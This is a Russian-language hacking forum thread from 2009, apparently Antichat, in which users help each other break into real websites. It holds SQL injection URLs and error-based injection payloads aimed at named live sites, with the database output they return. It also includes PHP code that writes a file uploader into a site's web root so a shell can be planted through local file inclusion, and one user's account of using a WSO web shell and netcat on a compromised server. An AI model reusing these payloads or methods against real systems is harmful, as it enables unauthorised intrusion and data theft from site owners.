 |
|
20.12.2009, 00:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
когда я говорил про LFI, то не имел в виду load_file, если вы не встречали таких скулей, где одновременно и скуля и LFI - то еще встретите. Просто надо внимательно читать ошибки, которые выводятся на экран.
|
|
|
20.12.2009, 00:07
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от Матня
Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.
Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь.
|
|
|
|
20.12.2009, 05:29
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от [aywo]
чем он правильнее???
скуля не принтабельна, поэтому и не выводится ниодного поля
а вот и принтабельное поле 2 3 ))
http://www.wallstreetcorner.com/new_lop.html?ID=209+union+select+1,2,3,4+from+WSCO pinion%00&Unique=yes
тока дальше не подчиняется ((
|
|
|
|
20.12.2009, 12:09
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
люди,знаю, что много раз обсуждалось, но все же, на фтп на все папки стоят права 755,а на файлы 644, ничего не могу залить. Можно ли как то обойти эту проблему?
P.S. Если есть мануалы, с радостью почитаю
Последний раз редактировалось jecka3000; 20.12.2009 в 12:45..
|
|
|
|
20.12.2009, 13:05
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами:
8730571
Репутация:
19
|
|
Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
|
|
|
|
20.12.2009, 13:06
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Сообщение от Root-access
Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь. Мне кажется Матня имел ввиду просто аплоадер файлов
Код:
<form enctype=multipart/form-data method=post>
<input name=x type=file><input type=submit></form>
<?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>
Ну а код, который этот аплоадер создает:
Код:
<?php $f = fopen('up.php','w');fwrite($f,'<form enctype=multipart/form-data method=post><input name=x type=file><input type=submit></form><?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>');fclose($f); ?>
|
|
|
|
20.12.2009, 17:19
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от Cybersteger
Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
http://forum.antichat.ru/showthread.php?t=107655
|
|
|
|
20.12.2009, 20:06
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
http://www.jetset.com.ua/rus/magazine/search/
в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.
|
|
|
|
20.12.2009, 20:28
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от $n@ke
в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.
Да, скуля, в строку поиска вводим:
Код:
%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Получаем:
MySQL Error: 1060 (Duplicate column name ' 5.0.51a')
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
20.12.2009, 20:32
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
2 $n@ke
Код:
xek%')/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b#
Duplicate column name ' CHARACTER_SETS' |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
